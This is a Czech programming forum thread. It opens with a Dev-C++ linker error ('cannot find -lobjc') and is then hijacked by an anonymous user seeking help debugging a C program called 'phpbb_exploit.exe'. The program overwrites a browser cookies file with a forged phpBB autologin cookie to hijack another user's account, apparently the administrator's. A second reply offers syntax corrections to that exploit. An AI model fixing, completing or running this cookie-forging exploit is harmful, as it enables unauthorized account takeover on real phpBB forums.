Problé s kompilací dev++ – C / C++ – Fórum – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

Problé s kompilací dev++ – C / C++ – Fórum – Programujte.comProblé s kompilací dev++ – C / C++ – Fórum – Programujte.com

 

miguel0
Newbie
30. 1. 2007   #1
-
0
-

mpilátor: Default compiler
Spouští se g++.exe...
g++.exe "C:\Program Files\Microsoft Visual Studio\MyProjects\Vypis46\ex46.cpp" -o "C:\Program Files\Microsoft Visual Studio\MyProjects\Vypis46\ex46.exe" -ansi -traditional-cpp -pg -g3 -I"C:\Dev-Cpp\lib\gcc\mingw32\3.4.2\include" -I"C:\Dev-Cpp\include\c++\3.4.2\backward" -I"C:\Dev-Cpp\include\c++\3.4.2\mingw32" -I"C:\Dev-Cpp\include\c++\3.4.2" -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -lgmon -pg -lobjc -g3
C:\Dev-Cpp\Bin\..\lib\gcc\mingw32\3.4.2\..\..\..\..\mingw32\bin\ld.exe: cannot find -lobjc
collect2: ld returned 1 exit status

Provádění ukončeno
Můžete mi někdo vysvětlit,co s tím?

Nahlásit jako SPAM
IP: ...–
Xyz
~ Anonymní uživatel
17 příspěvků
31. 1. 2007   #2
-
0
-

Mozete mi prosim povedat kde mam tady chybu ????
Nevjem nato prist :-(

#include <stdio.h>

#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A", "0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22", "%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;

if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");

if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}

strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);

if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the exploit or the user id is incorrect\n");
exit(0);
}

if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}

Nahlásit jako SPAM
IP: ...–
janc10
Návštěvník
31. 1. 2007   #3
-
0
-

Xyz mysli mze tu mas chyby:

int main(int argc, char** argv[]) {

FILE *pointer;
char contenido[10000],
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A", tu si dopln pole nejake naprl dalsie_cookie[50]="0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22", aj tu"%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;

Nahlásit jako SPAM
IP: ...–
zacatecnik0
Super člen
31. 1. 2007   #4
-
0
-

xyz proc se seres miguelovi do topicu ??? stvor si vlastni !

Nahlásit jako SPAM
IP: ...–
Můj blog http://www.zacatecnik.wu.cz[br]Překládám anglickou knihu o wxWidgets http://wxwidgets.hustej.net
Zjistit počet nových příspěvků

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku
Vlož URL adresu obrázku:
Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.
×
 
Podporujeme Gravatara.
Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.
-
Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.
Sledovat nové příspěvky (pouze pro přihlášené)
Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.
Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 20 hostů

Podobná vlákna

Problé se spuštěním. — založil SibleR

Problem s kompilaci — založil aTTix

Problém s kompilací — založil mk102

Moderátoři diskuze

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032024 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý